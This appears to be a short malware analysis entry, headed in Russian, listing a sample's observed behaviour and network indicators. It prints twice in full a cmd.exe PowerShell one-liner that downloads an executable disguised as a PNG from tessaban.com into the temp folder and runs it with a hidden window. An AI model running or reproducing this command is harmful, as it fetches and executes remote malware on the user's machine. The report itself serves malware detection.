Техническая информация
- http://www.tessaban.com/admin/images/nnntnttntttt.png как %temp%\cyparug.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.tessaban.com/admin/images/nnntnttntttt.png','%TMP%\cyparug.exe');Start-process '%TMP%\cyparug.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1186652.cvr
- 'te###ban.com':80
- http://www.te###ban.com/admin/images/nnntnttntttt.png
- DNS ASK te###ban.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.tessaban.com/admin/images/nnntnttntttt.png','%TMP%\cyparug.exe');Start-process '%TMP%\cyparug.exe';' (со скрытым окном)